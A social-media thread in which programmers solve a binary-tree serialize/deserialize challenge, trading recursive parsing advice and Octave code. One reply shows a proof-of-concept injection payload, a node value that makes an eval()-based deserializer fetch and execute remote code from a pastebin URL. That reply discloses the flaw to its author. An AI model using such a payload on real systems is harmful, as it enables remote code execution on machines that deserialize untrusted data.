#toyprogrammingchallenge
#python Here's another freebie, I assume it is python specific because they start with a base of python code. But if it makes sense, try it in whatever language you like:

This problem was asked by Google.

Given the root to a binary tree, implement serialize(root), which serializes the tree into a string, and deserialize(s), which deserializes the string back into the tree.

For example, given the following Node class

class Node:
def __init__(self, val, left=None, right=None):
self.val = val
self.left = left
self.right = right
The following test should pass:

node = Node('root', Node('left', Node('left.left')), Node('right'))
assert deserialize(serialize(node)).left.left.val == 'left.left'

Need a better solution for deserialization than eval()

https://git.qoto.org/Absinthe/serialize

@Absinthe Your implementation of serialize() can't handle nodes whose names contain quote marks. Ordinarily this would only cause it to output strings that deserialize() can't understand, but, since your implementation of deserialize() eval()s its argument, it's possible to execute arbitrary code on any machine attempting to deserialize(serialize()). For example:

node = Node("' + str(exec('import urllib.request; exec(urllib.request.urlopen(\\\'https://pastebin.com/raw/Tuh7jNbc\\\').read())')) + '")

deserialize(serialize(node));

@khird kind of figured there were good reasons not to use eval, but what is an appropriate alternative?
@Absinthe I have hardly any experience with Python but I think you ought to write your own parser that reports an error on input that can't represent an actual tree (this is what I did in my solution, anyway). The other issue is making sure you escape any special characters in Node.val so your parser doesn't treat them as control characters.

#toyprogrammingchallenge
#Python @billstclair @namark @khird

I think there should be a nice recursive way to deserialize it similar to the way it gets serialized. I am thinking some way to have a deserializer that returns a Node from a string, but I need to do something like Node(value from serialized string), deserialize(for the left node), deserialize(for the right node)) ...

I don't know how to partially consume the string to get the left node, and then take up where it left off for the right node. I was thinking maybe using an index but that would have to be similar to a C static variable. or globalized somehow so that it maintained state. I am missing a python paradigm somewhere. :)

@Absinthe @billstclair @khird
This one seems like a really broad problem, as opposed to a simple puzzle, unless the solution is some cute python specific trick, in which case eval doesn't sound that bad.

Otherwise, since there are no restriction on the serialized data, the simplest solution I think would be to split the tree into 2 data structures:

- associative array of fixed size ids and values,

- breadth first linearisation of the tree with the fixed size ids

and de/serialize that.

@namark @billstclair @khird Tree serialization seems to be one of those things that is generally easy to do with recursion. And so I did it. However, with the thoughts of deserialization, I figured I could serialize it to it's own deserialization command and run eval. Both pylint and the whole of the boaty mcBoatface crowd agree that eval is almost never the right answer for anything :) So I figure I would like to have a "parallel" deserialization, but somehow I have to be able to traverse something recursively while maintaining state. Or at least keep my place through multiple calls. :)

@Absinthe @billstclair @namark

I don't think you need any global variables.

Your input string looks something like Node('foo',None,Node('bar',None,None)) based on the ouput of your version of serialize(), right? So you can parse it recursively. The general algorithm could be something like:

1. Check that the string begins with 'Node('.

2. Find the first comma. Everything between 'Node(' until this point is self.val.

3. If the next four characters after the comma are 'None' self.left is None.

4. If self.left is not None, examine the string starting after the comma.
a. Set the nesting level to zero.
b. For every open-paren increment the nesting level by one.
c. For every close-paren decrement the nesting level by one.
d. When you find a comma AND the nesting level is zero, stop.

5. Recursively call deserialize() on everything between the comma you found in step 2 and the comma you found in step 4d. Save the answer as self.left.

6. If the next four characters after the comma are 'None' self.right is None.

7. If self.right is not None, examine the string starting after the comma.
a. Set the nesting level to zero.
b. For every open-paren increment the nesting level by one.
c. For every close-paren decrement the nesting level by one.
d. When you find a close-paren AND the nesting level is zero, stop.

8. Recursively call deserialize() on everything between the comma you found in step 4d and the close-paren you found in step 7d. Save the answer as self.right.

function self = node(val, left = [], right = [])
self.val = val;
self.left = left;
self.right = right; end;

function escaped = escape_chars(raw)
escaped = regexprep(raw, '([\\\(\),])', '\\$1'); end;

function raw = unescape_chars(escaped)
i = 1;
while i < numel(escaped)
if escaped(i) == '\'
escaped = escaped([1:(i - 1) (i + 1):end]); end;
i++; end;
raw = escaped; end

function index = val_extent(string)
special_chars = strchr(string, '(,)');
if isempty(special_chars)
index = 0;
else
is_backslash = string == '\';
for i = special_chars
is_escaped = false;
for j = (i - 1):-1:1
if is_backslash(j)
is_escaped = ~is_escaped;
else
break; end; end;
if ~is_escaped
break; end; end;
index = i; end; end;

function string = serialize(tree)
if isempty(tree)
string = [];
elseif isempty(tree.left) && isempty(tree.right)
string = escape_chars(tree.val);
else
string = [escape_chars(tree.val) '(' serialize(tree.left) ',' serialize(tree.right) ')']; end; end

function [node, leftover] = deserialize(string)
next_special = val_extent(string);
if next_special == 0
node.val = unescape_chars(string);
node.left = [];
node.right = [];
leftover = [];
elseif string(next_special) == '('
node.val = unescape_chars(string(1:(next_special - 1)));
leftover = string((next_special + 1):end);
[node.left, leftover] = deserialize(leftover);
[node.right, leftover] = deserialize(leftover);
else
if next_special == 1
node = [];
else
node.val = unescape_chars(string(1:(next_special - 1)));
node.left = [];
node.right = []; end
if string(next_special) == ','
leftover = string((next_special + 1):end);
else
leftover = string((next_special + 2):end); end; end; end;

@Absinthe How about, one crazy function that works both ways!
https://git.sr.ht/~namark/mercury_stuff/tree/master/toys/serialize_btree.m

Though, it goes haywire if input is invalid or if value contains anything in the form of "|number|", where number is less than depth of the tree. Probably has something to do with compiler complaining that code I wrote is impure and non-deterministic, and me just silencing it.
Also it only handles string values, cause I don't know how to write generic code yet.

#toyprogrammingchallenge #mercurylang

~namark/mercury_stuff: toys/serialize_btree.m - sourcehut git